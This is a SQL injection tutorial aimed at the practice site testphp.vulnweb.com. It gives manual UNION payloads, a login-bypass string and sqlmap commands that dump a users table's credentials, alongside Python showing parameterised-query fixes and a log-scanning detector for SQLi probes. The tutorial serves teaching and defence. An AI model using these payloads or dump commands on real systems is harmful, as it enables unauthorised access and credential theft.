Introduction
SQL Injection is a common flaw in systems where languages like PHP or ASP.NET are used to build database queries from request data. With this basic attack, information can be dumped from news items and user passwords up to administration credentials. In this topic I'll explain the basics of manual SQLi and of automated tools like SQLMap.
SQL Injection
For this explanation I'll use *http://testphp.vulnweb.com*
Manual SQL Injection
First, we need to find a vulnerable parameter, in this case:
http://testphp.vulnweb.com/artists.php?artist=1
At this point, we need to test whether this parameter is really vulnerable. A single quote can tell us:
http://testphp.vulnweb.com/artists.php?artist=1'
The expected result is a database error. Because this payload returned an error, the website might be vulnerable.
Now we need to know the number of columns the query returns, using `order by`: with `1 order by 1--` we can enumerate them, increasing the number to 2, 3… until we receive an error message like the one above. Let's try:
And we get an error, which means the `artists` query has 3 columns and we can manipulate them. But we need to know their positions, so let's use `-1 union select 1,2,3--`, and the result is:
The numbers we used overwrote the normal output, so now we know the positions and can try to get the database name with `-1 union select 1,2,database()--`. The expected output is:
Now that we know the database name, we can read all table names with `-1 union select 1,2,group_concat(table_name,0x0a) from information_schema.tables where table_schema=database()`. Let's try that:
We can see a very interesting table named `users`. Let's expose its columns with `-1 union select 1,2,group_concat(column_name,0x0a) from information_schema.columns where table_name='users'` and we can see the column names:
This is very, very bad… but not for us! Let's expose the content of the columns `uname`, `pass` and `email` with `-1 union select 1,2,group_concat(uname,0x0a,pass,0x0a,email) from acuart.users` and we get sensitive information easily:
With a username and password, let's try to log in:
We can log in with the stolen credentials!
Bonus: we can also log in without the stolen credentials, using `' or ' 1 = 1` as both username and password, because the login form is vulnerable too:
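As an added illustration (not code from the original post), the following Python script reproduces the two patterns above against a throwaway SQLite database: an artist lookup and a login built by string concatenation, next to the same queries written with bound parameters. The table layout, the sample user `test`/`test` and the artist rows are constructed for the example and are not the real testphp.vulnweb.com data. It shows why the single-quote probe produces an error, why `-1 union select 1,2,3--` makes the concatenated query return attacker-chosen values, and why the `' or ' 1 = 1` login bypass stops working once the values are bound instead of pasted into the statement.

```python
import sqlite3

# Constructed sample data standing in for the 'users' and 'artists' tables
# seen in the walkthrough (not the real testphp.vulnweb.com schema or content).
SAMPLE_USERS = [("test", "test", "test@example.com")]
SAMPLE_ARTISTS = [(1, "Artist One", "first description"),
                  (2, "Artist Two", "second description")]


def make_db():
    """Build an in-memory database with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (uname TEXT, pass TEXT, email TEXT)")
    conn.execute("CREATE TABLE artists (artist_id INTEGER, aname TEXT, adesc TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    conn.executemany("INSERT INTO artists VALUES (?, ?, ?)", SAMPLE_ARTISTS)
    return conn


def vulnerable_artist(conn, artist):
    # The request value is pasted straight into the SQL text, so whatever the
    # client sends becomes part of the statement (the pattern the walkthrough abuses).
    sql = f"SELECT artist_id, aname, adesc FROM artists WHERE artist_id={artist}"
    return conn.execute(sql).fetchall()


def safe_artist(conn, artist):
    # The value travels as a bound parameter: it is compared as data and can
    # never change the shape of the statement, so UNION or comment tricks are inert.
    sql = "SELECT artist_id, aname, adesc FROM artists WHERE artist_id=?"
    return conn.execute(sql, (artist,)).fetchall()


def vulnerable_login(conn, uname, pw):
    # Same defect on the login form: quotes in the input close the literal early.
    sql = f"SELECT uname FROM users WHERE uname='{uname}' AND pass='{pw}'"
    return conn.execute(sql).fetchone() is not None


def safe_login(conn, uname, pw):
    sql = "SELECT uname FROM users WHERE uname=? AND pass=?"
    return conn.execute(sql, (uname, pw)).fetchone() is not None


def probe_raises_error(conn):
    """The single-quote test: a syntax error on the concatenated query."""
    try:
        vulnerable_artist(conn, "1'")
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("quote probe errors on the vulnerable query:", probe_raises_error(db))
    print("vulnerable union:", vulnerable_artist(db, "-1 union select 1,2,3--"))
    print("parameterised union:", safe_artist(db, "-1 union select 1,2,3--"))
    bypass = "' or ' 1 = 1"
    print("vulnerable login bypass:", vulnerable_login(db, bypass, bypass))
    print("parameterised login bypass:", safe_login(db, bypass, bypass))
```

Binding the parameters closes the injection, but note that it does nothing about the other weakness the dump exposed: passwords stored in clear text. That needs a separate fix (a salted password hash compared server-side), since a SQLi elsewhere, a backup leak, or an insider would still read the `pass` column as-is.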
Automated SQL Injection
Not everything is roses: manual SQL injection can be useless if the target does not show errors or query output (blind SQL injection) or if the target has a huge database… But we have a solution: SQLMap!
You can get it from https://github.com/sqlmapproject/sqlmap
After installing it, let's try to expose data from the target. First we need to find the vulnerable parameter, in this case:
http://testphp.vulnweb.com/artists.php?artist=1
And, as in the manual SQL injection reconnaissance, we need an error message after adding a single quote:
http://testphp.vulnweb.com/artists.php?artist=1'
Now that we know the vulnerable parameter, let's hack it! In your console run `sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --dbs` and we can see the available databases:
And we can get the table names of the `acuart` database with `sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart --tables`, which lists the table names:
The interesting table to expose is `users`; with `sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users --columns` we can see the column names:
Let's dump the content of the columns with `sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users -C uname,pass,email --dump` and we get the credentials of user `test`:
Let’s try to login with the credentials:
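On the defending side, the probes in both walkthroughs leave a distinctive trail in the web server's access log: a lone quote appended to a numeric parameter, `order by` with an increasing number, `union select`, reads from `information_schema`, and, for the automated run, sqlmap's default User-Agent unless the operator changes it. The script below is an added example (not from the original post or the sqlmap project) that scans a handful of constructed Apache-style log lines for those markers and reports each client that shows a tool signature or more than one probe class. The IP addresses, timestamps and the `sqlmap/...` User-Agent string are made up for the sample.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines in Apache combined format (sample data, not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /artists.php?artist=1 HTTP/1.1" 200 2326 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /artists.php?artist=1%27 HTTP/1.1" 200 1104 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:52 +0000] "GET /artists.php?artist=1%20order%20by%204-- HTTP/1.1" 200 1104 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:56:10 +0000] "GET /artists.php?artist=-1%20union%20select%201,2,database()-- HTTP/1.1" 200 2201 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:56:30 +0000] "GET /artists.php?artist=-1%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables-- HTTP/1.1" 200 2402 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:14:01:02 +0000] "GET /artists.php?artist=2 HTTP/1.1" 200 2310 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Oct/2023:14:05:15 +0000] "GET /artists.php?artist=1%20AND%201=1 HTTP/1.1" 200 2326 "-" "sqlmap/1.7 (https://sqlmap.org)"
"""

# Combined log format: client ip, timestamp, request line, status, size, referer, user-agent
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Each rule is (name, regex) applied to the URL-decoded, lower-cased parameter value.
RULES = [
    ("quote_probe", re.compile(r"^\d+'")),                       # 1'
    ("order_by_enum", re.compile(r"\border\s+by\s+\d+")),         # 1 order by 4
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("schema_read", re.compile(r"information_schema\.")),
    ("comment_tail", re.compile(r"(--|#)\s*$")),                  # trailing SQL comment
    ("boolean_probe", re.compile(r"\b(and|or)\b\s+\S+\s*=\s*\S+")),  # 1 and 1=1
]


def parse_line(line):
    """Split one combined-format line into fields plus decoded query parameters."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # parse_qs percent-decodes values, so "1%27" arrives here as "1'"
    query = parse_qs(urlsplit(rec["target"]).query, keep_blank_values=True)
    rec["params"] = query
    return rec


def classify(rec):
    """Return the set of probe classes a single request matches."""
    hits = set()
    if "sqlmap" in rec["ua"].lower():
        hits.add("sqlmap_ua")
    for values in rec["params"].values():
        for value in values:
            low = value.lower()
            for name, rx in RULES:
                if rx.search(low):
                    hits.add(name)
    return hits


def analyze(log_text):
    """Aggregate probe classes per client and keep the ones worth an alert."""
    per_ip = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        per_ip[rec["ip"]] |= classify(rec)
    # One lone quote can be a typo; a tool signature or several distinct probe
    # classes from the same client is the enumeration sequence shown above.
    return {ip: sorted(h) for ip, h in per_ip.items()
            if "sqlmap_ua" in h or len(h) > 1}


if __name__ == "__main__":
    for ip, classes in analyze(SAMPLE_LOG).items():
        print(ip, "->", ", ".join(classes))
```

Pattern matching on the access log catches the textbook sequence but not an attacker who encodes, comments or case-mixes around it, and the User-Agent check only works while the tool's default is left in place. Treat this as a cheap first signal; the durable fix is the parameterised query on the server, with database error details kept out of HTTP responses so the single-quote probe no longer confirms anything.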
I hope you liked this topic; use it responsibly.